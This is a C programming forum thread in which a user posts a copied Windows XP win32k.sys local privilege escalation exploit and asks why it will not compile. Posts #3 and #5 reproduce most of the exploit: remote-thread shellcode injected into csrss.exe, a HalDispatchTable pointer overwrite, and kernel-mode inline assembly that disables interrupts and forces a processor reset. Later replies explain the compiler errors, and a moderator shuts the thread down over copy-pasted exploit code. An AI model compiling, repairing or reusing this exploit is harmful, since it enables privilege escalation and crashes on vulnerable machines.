Thread: What is wrong with these?

  1. #1
    Registered User
    Join Date
    Aug 2012
    Posts
    17

    What is wrong with these?

    Code:
    (
        PUCHAR *String
    );
    With the above I get this error,

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|3|erro r: expected identifier or '(' before 'PUCHAR'|

    And with this one roughly the same error but different.

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|23|err or: expected ')' before 'Filter'|

    Code:
    (
        IN INBV_DISPLAY_STRING_FILTER Filter
    );
    Code:
    (PVOID*)&InbvInstallDisplayStringFilter);
    With this line I get three errors could anyone point out my mistake?

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|153|er ror: 'InbvInstallDisplayStringFilter' undeclared (first use in this function)|

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|153|er ror: (Each undeclared identifier is reported only once|

    E:\NtUserConsoleControl_Exp\InvbShellCode.h|153|er ror: for each function it appears in.)|
    Last edited by terminology; 08-11-2012 at 12:27 PM.

  2. #2
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    28,412
    Post the smallest and simplest program -- that uses those code snippets -- which you expect to compile, but which doesn't compile.
    Quote Originally Posted by Bjarne Stroustrup (2000-10-14)
    I get maybe two dozen requests for help with some sort of programming or design problem every day. Most have more sense than to send me hundreds of lines of code. If they do, I ask them to find the smallest example that exhibits the problem and send me that. Mostly, they then find the error themselves. "Finding the smallest program that demonstrates the error" is a powerful debugging tool.
    Look up a C++ Reference and learn How To Ask Questions The Smart Way

  3. #3
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Code:
    ////////////////////////////////////////////////////////////////////////////////////
    // +----------------------------------------------------------------------------+ //
    // |                                                                            | //
    // | Microsoft Corporation - http://www.microsoft.com/                          | //
    // |                                                                            | //
    // | Affected Software:                                                         | //
    // | Windows XP Service Pack 2                                                  | //
    // | Windows XP Service Pack 3                                                  | //
    // |                                                                            | //
    // | Affected Driver:                                                           | //
    // | Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796                      | //
    // |                                                                            | //
    // | Local Privilege Escalation Exploit                                         | //
    // | For Educational Purposes Only !                                            | //
    // |                                                                            | //
    // +----------------------------------------------------------------------------+ //
    // |                                                                            | //
    // | NT Internals - http://www.ntinternals.org/                                 | //
    // | alex ntinternals org                                                       | //
    // | 30 July 2009                                                               | //
    // |                                                                            | //
    // | References:                                                                | //
    // | Exploiting Common Flaws in Drivers                                         | //
    // | Ruben Santamarta - http://www.reversemode.com/                             | //
    // |                                                                            | //
    // +----------------------------------------------------------------------------+ //
    ////////////////////////////////////////////////////////////////////////////////////
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    #include "NtUserConsoleControl_Exp.h"
    #include "InvbShellCode.h"
    #include "XxNativeFunctions.c"
    
    int __cdecl main(int argc, char **argv)
    {
        NTSTATUS NtStatus;
    
        ULONG AllocationSize = PAGE_SIZE * 64;
        ULONG ImageBase;
        PVOID MappedBase;
        UCHAR ImageName[KERNEL_NAME_LENGTH];
        ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES;
        PVOID HalDispatchTable;
        PVOID xHalQuerySystemInformation;
    
        HANDLE ProcessHandle;
        HANDLE UniqueProcess;
        HANDLE ThreadHandle;
        HANDLE UniqueThread;
    
        ULONG ShellCodeSize = PAGE_SIZE;
        PVOID ShellCodeAddress;
        PVOID BaseAddress = NULL;
        ULONG SyscallNumber = 0x114E;
        USHORT OSBuildNumber;
    
        UNICODE_STRING DllName;
        ANSI_STRING ProcedureName;
        PSYSTEM_MODULE_INFORMATION_EX ModuleInformation = NULL;
        LARGE_INTEGER Interval;
    
        UCHAR ThreadShellCode[] =
                                    "\x55"                 // push ebp
                                    "\x8B\xEC"             // mov ebp, esp
    
                                    "\x2B\xC0"             // sub eax, eax
                                    "\x68\xDE\xC0\xAD\xDE" // push 0xDEADC0DE
                                    "\x6A\x07"             // push 0x07
                                    "\x50"                 // push eax
    
                                    "\xB8\xAD\xDE\x00\x00" // mov eax, 0xDEAD - NtUserConsoleControl
                                    "\xBA\x00\x03\xFE\x7F" // mov edx, 0x7FFE0300
                                    "\xFF\x12"             // call dword ptr [edx]
                                    "\xC9"                 // leave
                                    "\xC3"                 // ret
                                    "\xCC";                // int 0x03
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        system("cls");
    
    
        NtStatus = NtAllocateVirtualMemory(
                                           NtCurrentProcess(), // ProcessHandle
                                           &ModuleInformation, // BaseAddress
                                           0,                  // ZeroBits
                                           &AllocationSize,    // AllocationSize
                                           MEM_COMMIT,         // AllocationType
                                           PAGE_READWRITE);    // Protect
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtAllocateVirtualMemory [1] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        NtStatus = NtQuerySystemInformation(
                                            SystemModuleInformation,
                                            (PSYSTEM_MODULE_INFORMATION_EX)ModuleInformation,
                                            AllocationSize,
                                            NULL);
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtQuerySystemInformation - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        ImageBase = (ULONG)(ModuleInformation->Modules[0].Base);
    
    
        RtlMoveMemory(
                      ImageName,
                      (PVOID)(ModuleInformation->Modules[0].ImageName +
                      ModuleInformation->Modules[0].ModuleNameOffset),
                      KERNEL_NAME_LENGTH);
    
        printf(" +----------------------------------------------------------------------------+\n"
               " | ImageBase - %.8X                                                       |\n"
               " | ImageName - %s                                                   |\n",
               ImageBase,
               ImageName);
    
    
        NtStatus = NtFreeVirtualMemory(
                                       NtCurrentProcess(), // ProcessHandle
                                       &ModuleInformation, // BaseAddress
                                       &AllocationSize,    // FreeSize
                                       MEM_DECOMMIT);      // FreeType
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtFreeVirtualMemory [1] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName);
    
    
        NtStatus = LdrLoadDll(
                              NULL,                // DllPath
                              &DllCharacteristics, // DllCharacteristics
                              &DllName,            // DllName
                              &MappedBase);        // DllHandle
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrLoadDll - %.8X\n", NtStatus);
            return NtStatus;
        }
    
    
        RtlInitAnsiString(&ProcedureName, "HalDispatchTable");
    
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,          // DllHandle
                                          &ProcedureName,             // ProcedureName
                                          0,                          // ProcedureNumber OPTIONAL
                                          (PVOID*)&HalDispatchTable); // ProcedureAddress
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress [1] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC) ((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
        xHalQuerySystemInformation = (FUNC) (ULONG)HalDispatchTable + sizeof(ULONG);
    
        printf(" |                                                                            |\n"
               " | HalDispatchTable - %.8X                                                |\n"
               " | xHalQuerySystemInformation - %.8X                                      |\n"
               " +----------------------------------------------------------------------------+\n",
               HalDispatchTable,
               xHalQuerySystemInformation);
    
    
        NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxInitInbv - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        RtlFreeUnicodeString(&DllName);
        RtlFreeAnsiString(&ProcedureName);
    
        LdrUnloadDll((PVOID)MappedBase);
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        NtStatus = XxGetProcessHandle(
                                      L"csrss.exe",
                                      &ProcessHandle,
                                      &UniqueProcess);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxGetProcessHandle - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        printf(" +----------------------------------------------------------------------------+\n"
               " | Client Server Runtime Process - csrss.exe                                  |\n"
               " | ProcessId - %.4d                                                           |\n"
               " | ProcessHandle - %.4X                                                       |\n",
               UniqueProcess,
               ProcessHandle);
    
        xHalQuerySystemInformation = (FUNC) (ULONG) - 0x0C;
    
        RtlMoveMemory(
                      ThreadShellCode + 6,
                      &xHalQuerySystemInformation,
                      sizeof(ULONG));
    
    
        NtStatus = XxGetOSVersion(
                                  NULL,
                                  NULL,
                                  &OSBuildNumber);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxGetOSVersion - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        if(OSBuildNumber == 2600)
        {
            RtlMoveMemory(
                          ThreadShellCode + 14,
                          &SyscallNumber,
                          sizeof(ULONG));
        }
        else
        {
            printf(" [*] Unsupported OS...\n");
            return TRUE;
        }
    
    
        NtStatus = XxCreateThread(
                                  &ThreadHandle,
                                  &UniqueThread,
                                  ProcessHandle,
                                  UniqueProcess,
                                  ThreadShellCode,
                                  sizeof(ThreadShellCode));
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of XxCreateThread - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        printf(" |                                                                            |\n"
               " | RemoteThreadId - %.4d                                                      |\n"
               " | RemoteThreadHandle - %.4X                                                  |\n"
               " +----------------------------------------------------------------------------+\n",
               UniqueThread,
               ThreadHandle);
    
        ///////////////////////////////////////////////////////////////////////////////////////////////
    
        ShellCodeAddress = (PVOID)sizeof(ULONG);
    
    
        NtStatus = NtAllocateVirtualMemory(
                                           NtCurrentProcess(),
                                           &ShellCodeAddress,
                                           0,
                                           &ShellCodeSize,
                                           MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                           PAGE_EXECUTE_READWRITE);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtAllocateVirtualMemory [2] - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        RtlMoveMemory(ShellCodeAddress, (PVOID)InbvShellCode, ShellCodeSize);
    
    
        Interval.LowPart = 0xFF676980;
        Interval.HighPart = 0xFFFFFFFF;
    
        printf("\n 3");
        NtDelayExecution(FALSE, &Interval);
    
        printf(" 2");
        NtDelayExecution(FALSE, &Interval);
    
        printf(" 1");
        NtDelayExecution(FALSE, &Interval);
    
        printf(" Hoop\n\n");
        NtDelayExecution(FALSE, &Interval);
    
    
        NtStatus = NtQueryIntervalProfile(
                                          ProfileTotalIssues, // Source
                                          NULL);              // Interval
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtQueryIntervalProfile - %.8X\n", NtStatus);
            return NtStatus;
        }
    
        return FALSE;
    }

  4. #4
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    28,412
    I should have emphasized smallest and simplest. Anyway, I did a quick search of "PUCHAR *String", "IN INBV_DISPLAY_STRING_FILTER Filter" and "(PVOID*)&InbvInstallDisplayStringFilter)" on this page, and I didn't get any matches in post #2, so I'm just going to wait until you post code that actually matches what you described as the problem, and hopefully the code really is small and simple.
    Quote Originally Posted by Bjarne Stroustrup (2000-10-14)
    I get maybe two dozen requests for help with some sort of programming or design problem every day. Most have more sense than to send me hundreds of lines of code. If they do, I ask them to find the smallest example that exhibits the problem and send me that. Mostly, they then find the error themselves. "Finding the smallest program that demonstrates the error" is a powerful debugging tool.
    Look up a C++ Reference and learn How To Ask Questions The Smart Way

  5. #5
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Sorry about the length of this code.

    Code:
    typedef void (*FUNC) (void);
    (
        PUCHAR *String
    );
    
    VOID (__stdcall *InbvAcquireDisplayOwnership)
    (
        VOID
    );
    
    VOID (__stdcall *InbvDisplayString)
    (
        IN PCHAR String
    );
    
    VOID (__stdcall *InbvEnableDisplayString)
    (
        IN BOOLEAN Enable
    );
    
    VOID (__stdcall *InbvInstallDisplayStringFilter)
    (
        IN INBV_DISPLAY_STRING_FILTER Filter
    );
    
    VOID (__stdcall *InbvResetDisplay)
    (
        VOID
    );
    
    VOID (__stdcall *InbvSetScrollRegion)
    (
        IN ULONG Left,
        IN ULONG Top,
        IN ULONG Width,
        IN ULONG Height
    );
    
    VOID (__stdcall *InbvSetTextColor)
    (
        IN ULONG Color
    );
    
    VOID (__stdcall *InbvSolidColorFill)
    (
        IN ULONG Left,
        IN ULONG Top,
        IN ULONG Width,
        IN ULONG Height,
        IN ULONG Color
    );
    
    NTSTATUS XxInitInbv(IN ULONG ImageBase, IN ULONG MappedBase)
    {
        NTSTATUS NtStatus;
    
        ANSI_STRING ProcedureName;
    
    
        //
        // InbvAcquireDisplayOwnership
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvAcquireDisplayOwnership");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,                     // DllHandle
                                          &ProcedureName,                        // ProcedureName
                                          0,                                     // ProcedureNumber OPTIONAL
                                          (PVOID*)&InbvAcquireDisplayOwnership); // ProcedureAddress
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvAcquireDisplayOwnership - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvResetDisplay
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvResetDisplay");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvResetDisplay);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvResetDisplay - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvSolidColorFill
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvSolidColorFill");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvSolidColorFill);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSolidColorFill - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvSetTextColor
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvSetTextColor");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvSetTextColor);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetTextColor - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
        //
        // InbvInstallDisplayStringFilter
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvInstallDisplayStringFilter");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvInstallDisplayStringFilter);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvInstallDisplayStringFilter - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        (ULONG)InbvInstallDisplayStringFilter -= MappedBase;
        (ULONG)InbvInstallDisplayStringFilter += ImageBase;
    
    
        //
        // InbvEnableDisplayString
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvEnableDisplayString");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvEnableDisplayString);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvEnableDisplayString - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvSetScrollRegion
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvSetScrollRegion");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvSetScrollRegion);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetScrollRegion - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        //
        // InbvDisplayString
        //
    
        RtlInitAnsiString(&ProcedureName, "InbvDisplayString");
    
        NtStatus = LdrGetProcedureAddress(
                                          (PVOID)MappedBase,
                                          &ProcedureName,
                                          0,
                                          (PVOID*)&InbvDisplayString);
    
        if(NtStatus)
        {
            printf(" [*] NtStatus of LdrGetProcedureAddress - InbvDisplayString - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
    
        InbvAcquireDisplayOwnership = (FUNC)((ULONG)InbvAcquireDisplayOwnership - MappedBase + ImageBase);
    
    
        printf(" +----------------------------------------------------------------------------+\n"
               " | InbvAcquireDisplayOwnership - 0x%.8X                                   |\n"
               " | InbvResetDisplay - 0x%.8X                                              |\n"
               " | InbvSolidColorFill - 0x%.8X                                            |\n"
               " | InbvSetTextColor - 0x%.8X                                              |\n"
               " | InbvInstallDisplayStringFilter - 0x%.8X                                |\n"
               " | InbvEnableDisplayString - 0x%.8X                                       |\n"
               " | InbvSetScrollRegion - 0x%.8X                                           |\n"
               " | InbvDisplayString - 0x%.8X                                             |\n"
               " +----------------------------------------------------------------------------+\n\n",
               InbvAcquireDisplayOwnership,
               InbvResetDisplay,
               InbvSolidColorFill,
               InbvSetTextColor,
               InbvInstallDisplayStringFilter,
               InbvEnableDisplayString,
               InbvSetScrollRegion,
               InbvDisplayString);
    
        RtlFreeAnsiString(&ProcedureName);
    
        return STATUS_SUCCESS;
    }
    
    VOID InbvShellCode()
    {
        UCHAR BugCheck01[] = " 3";
        UCHAR BugCheck02[] = " 2";
        UCHAR BugCheck03[] = " 1";
        UCHAR BugCheck04[] = " Rebooting ...";
        UCHAR BugCheckString[] =
        "                                                                                "
        " Microsoft Corporation - http://www.microsoft.com/                              "
        "                                                                                "
        " Affected Software:                                                             "
        " Windows XP Service Pack 2                                                      "
        " Windows XP Service Pack 3                                                      "
        "                                                                                "
        " Affected Driver:                                                               "
        " Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796                          "
        "                                                                                "
        " Local Privilege Escalation Exploit                                             "
        " For Educational Purposes Only !                                                "
        "                                                                                "
        "                                                                                "
        " NT Internals - http://www.ntinternals.org/                                     "
        " alex ntinternals org                                                           "
        " 30 July 2009                                                                   "
        "                                                                                "
        " References:                                                                    "
        " Exploiting Common Flaws in Drivers                                             "
        " Ruben Santamarta - http://www.reversemode.com/                                 "
        "                                                                                "
        "                                                                                ";
    
        __asm
        {
            //
            // KeDisableInterrupts
            //
            pushf
            pop eax
            and eax, 0x0200
            shr eax, 0x09
            cli
    
            //
            // Prepareing Screen
            //
            call InbvAcquireDisplayOwnership
    
            call InbvResetDisplay
    
            sub esi, esi
            push 0x04
            mov edi, 0x01DF
            push edi
            mov ebx, 0x027F
            push ebx
            push esi
            push esi
            call InbvSolidColorFill
    
            push 0x0F
            call InbvSetTextColor
    
            push esi
            call InbvInstallDisplayStringFilter
    
            inc esi
            push esi
            call InbvEnableDisplayString
    
            dec edi
            dec edi
            push edi
            push ebx
            dec esi
            push esi
            push esi
            call InbvSetScrollRegion
    
            lea eax, BugCheckString
            push eax
            call InbvDisplayString
    
            mov esi, 0x80000000
            mov ecx, esi
    
            //
            // Countdown
            //
        __loop01:
            dec ecx
            jnz __loop01
    
            lea eax, BugCheck01
            push eax
            call InbvDisplayString
    
            mov ecx, esi
    
        __loop02:
            dec ecx
            jnz __loop02
    
            lea eax, BugCheck02
            push eax
            call InbvDisplayString
    
            mov ecx, esi
    
        __loop03:
            dec ecx
            jnz __loop03
    
            lea eax, BugCheck03
            push eax
            call InbvDisplayString
    
            mov ecx, esi
    
        __loop04:
            dec ecx
            jnz __loop04
    
            lea eax, BugCheck04
            push eax
            call InbvDisplayString
    
            mov ecx, esi
            shl ecx, 0x01
    
        __loop05:
            dec ecx
            jnz __loop05
    
            //
            // Reseting Processor
            //
            mov al, 0xFE
            out 0x64, al
        }
    }

  6. #6
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    28,412
    Ah, now we're talking.

    What did you intend by writing the code below?
    Code:
    typedef void (*FUNC) (void);
    (
        PUCHAR *String
    );
    It can be re-written as:
    Code:
    typedef void (*FUNC) (void);
    
    (PUCHAR *String);
    Upon which it becomes apparent that you are trying to declare a PUCHAR* named String, except that for some reason you placed the declaration in parentheses instead of writing:
    Code:
    PUCHAR *String;
    For the error concerning InbvInstallDisplayStringFilter, it is as the error message says: InbvInstallDisplayStringFilter was not declared.
    Quote Originally Posted by Bjarne Stroustrup (2000-10-14)
    I get maybe two dozen requests for help with some sort of programming or design problem every day. Most have more sense than to send me hundreds of lines of code. If they do, I ask them to find the smallest example that exhibits the problem and send me that. Mostly, they then find the error themselves. "Finding the smallest program that demonstrates the error" is a powerful debugging tool.
    Look up a C++ Reference and learn How To Ask Questions The Smart Way

  7. #7
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Ok thanks very much for the help.

  8. #8
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    Could you help point out the errors with what i've got here? I understand the undeclared bits but how do I declare these properly?

    E:\NtUserConsoleControl_Exp\InvbShellCode.h||In function 'InbvShellCode':|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|283|er ror: expected '(' before '{' token|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|287|er ror: 'pushf' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|287|er ror: (Each undeclared identifier is reported only once|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|287|er ror: for each function it appears in.)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|288|er ror: 'pop' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|288|er ror: 'eax' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|289|er ror: 'and' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|290|er ror: 'shr' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|291|er ror: 'cli' undeclared (first use in this function)|
    E:\NtUserConsoleControl_Exp\InvbShellCode.h|296|er ror: expected ';' before 'call'|
    E:\NtUserConsoleControl_Exp\NtUserConsoleControl_E xp.c||In function 'main':|
    E:\NtUserConsoleControl_Exp\NtUserConsoleControl_E xp.c|173|error: invalid operands to binary - (have 'long unsigned int' and 'PVOID')|
    ||=== Build finished: 11 errors, 0 warnings ===|

  9. #9
    Registered User
    Join Date
    Apr 2008
    Posts
    396
    These are assembly statements enclosed in the __asm directive, the compiler should normally skip them.
    You get syntax errors meaning your compiler simply doesn't understand that directive (which is a compiler extension by the way, not pure C).
    I suggest you check your compiler documentation, or provide the additional details on your development tools here.

  10. #10
    Registered User
    Join Date
    Aug 2012
    Posts
    17
    I'm using codeblocks with the GNU GCC Compiler as i've never really used any other IDE for compiling with C, I have also tried to use Visual Express 2010 which throws out the same errors and Tiny C Compiler which throws one error out and then just quits.

  11. #11
    Registered User
    Join Date
    Aug 2005
    Location
    Austria
    Posts
    1,990
    gcc uses AT&T assembler syntax. It's quite different to intel assembler that msvc uses.

    Kurt

  12. #12
    and the hat of int overfl Salem's Avatar
    Join Date
    Aug 2001
    Location
    The edge of the known universe
    Posts
    39,656
    OK, I'm drawing a line under this.
    Announcements - C Programming
    Quote Originally Posted by the rules
    6. Messages relating to cracking, (erroneously called "hacking" by many), copyright violations, or other illegal activities will be deleted. Due to the overlapping boundaries of code with malicious intent, and other legitimate uses of it, the moderators will assess each potential infraction on a case by case basis.
    Quote Originally Posted by terminology
    Look i'm not trying to get you guys to do all the work, i'm not a script kiddie I am learning code at the minute but I am also learning IT Security as I do wish to become a CEH (Certified Ethical Hacker), I will not be using this with malicious intent, I have already set up a virtual box for testing and even if I did use it it would be that gets into s**t for it so.
    Now this is the 2nd thread where you've posted basically the same "found" code and the "it doesn't work" refrain. This makes it seem to me exactly like you're the kind of script kiddie you profess in your other thread not to be.

    smokeyangel's post #18 is bang on - you need to learn all the basic stuff first.
    In particular, you NEED to learn that every compiler treats inline assembler differently.

    If you're serious about CEH, you should be able to analyse the code "on paper" and create your own version yourself based on the theoretical description. This would be a more valuable learning exercise than what you're trying to do at the moment.

    If you want help learning C or C++, then I'm sure we can help you.

    But block copy/pasting exploit code has to stop.
    If you dance barefoot on the broken glass of undefined behaviour, you've got to expect the occasional cut.
    If at first you don't succeed, try writing your phone number on the exam paper.

  13. #13
    Registered User
    Join Date
    Dec 2011
    Posts
    795
    This should be in the Windows-only forum, as it obviously pertains to Windows-specific APIs and architecture.

    Also, don't act like you're interested in computer security when you've just copied code you found here and tried to compile it. People who are actual computer security professionals have taken classes/read books/studied exactly how attacks work and ways to prevent them.

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. Replies: 3
    Last Post: 11-14-2011, 06:35 PM
  2. wrong wrong with my xor function?
    By Anddos in forum C++ Programming
    Replies: 5
    Last Post: 04-26-2009, 01:38 PM
  3. whats wrong with this? no errors but wrong result
    By InvariantLoop in forum C Programming
    Replies: 6
    Last Post: 01-28-2005, 12:48 AM
  4. Replies: 9
    Last Post: 07-15-2004, 03:30 PM
  5. what is wrong =(
    By Unregistered in forum C Programming
    Replies: 4
    Last Post: 07-01-2002, 05:58 AM